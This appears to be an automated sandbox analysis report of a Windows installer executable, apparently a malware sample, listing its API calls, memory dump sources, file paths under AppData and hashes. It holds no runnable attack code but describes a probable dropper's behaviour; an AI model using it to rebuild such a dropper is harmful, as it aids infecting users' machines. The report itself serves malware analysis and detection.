                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,004042CF), ref: 00404502
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                                                                      • Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                                                                                                                                                      • Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
                                                                                                                                                                                      • Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,762323A0), ref: 00405637
                                                                                                                                                                                        • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                                        • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, Hype,e",?), ref: 00405B63
                                                                                                                                                                                        • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, Hype,e",?), ref: 00405B70
                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                                                                                                                                        • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                                                                                                                                                                        • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                                                                                                                                                                        • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2972824698-0
                                                                                                                                                                                      • Opcode ID: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                                                                                                                                                                      • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                                                                                                                                                                      • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                                                                                                                                                                      • lstrcmpiW.KERNEL32(: Completed,0042CA68,00000000,?,?), ref: 00404B2E
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,: Completed), ref: 00404B3A
                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                                                                                                                                                                        • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                                                                                                                                                                        • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\av8XPPpdBc.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                                                                                                                        • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                                                                                                                        • Part of subcall function 00406805: CharNextW.USER32(?,"C:\Users\user\Desktop\av8XPPpdBc.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                                                                                                                        • Part of subcall function 00406805: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                                                                                                                                                                        • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                                                                                                                        • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                                                                                                                                                                        • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                      • String ID: : Completed$A$C:\Users\user\AppData\Roaming\erstatningsgraden
                                                                                                                                                                                      • API String ID: 2624150263-3870413507
                                                                                                                                                                                      • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                                                                                                                      • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                                                                                                                                                                      • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                                                                                                                      • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers, xrefs: 0040226E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers
                                                                                                                                                                                      • API String ID: 542301482-4212467774
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                                                                                                                                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040503D
                                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                                                                                                                                                                        • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 0040519F
                                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 0040537D
                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00405527
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405539
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                      • String ID: $M$N
                                                                                                                                                                                      • API String ID: 2564846305-813528018
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00404775
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00404796
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 00404818
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00404897
                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004048B3
                                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                      • String ID: : Completed$N
                                                                                                                                                                                      • API String ID: 3103080414-2140067464
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                      • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                                                                                                                                                                        • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                                                                                                                        • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                                                                                                                                                                      • wsprintfA.USER32 ref: 0040621C
                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                                                                                                                                                                      • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406305
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                                                                                                                                                                        • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\av8XPPpdBc.exe,80000000,00000003), ref: 0040604B
                                                                                                                                                                                        • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                      • API String ID: 2171350718-461813615
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\av8XPPpdBc.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                                                                                                                      • CharNextW.USER32(?,"C:\Users\user\Desktop\av8XPPpdBc.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                                                                                                                      • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • *?|<>/":, xrefs: 00406857
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406806
                                                                                                                                                                                      • "C:\Users\user\Desktop\av8XPPpdBc.exe", xrefs: 00406849
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\av8XPPpdBc.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                      • API String ID: 589700163-1519629447
                                                                                                                                                                                      • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                                                      • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                                                                                                                                                                      • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                                                      • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 00404598
                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 004045B0
                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 004045C3
                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 004045D3
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004045ED
                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                      • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                                      • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                                                                                                                                        • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                      • String ID: 9
                                                                                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                                                                                      • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                                                                                                                      • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                                                                                                                      • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                                                                                                                                                                      • GetMessagePos.USER32 ref: 00404EB4
                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404ECE
                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                      • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                                      • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
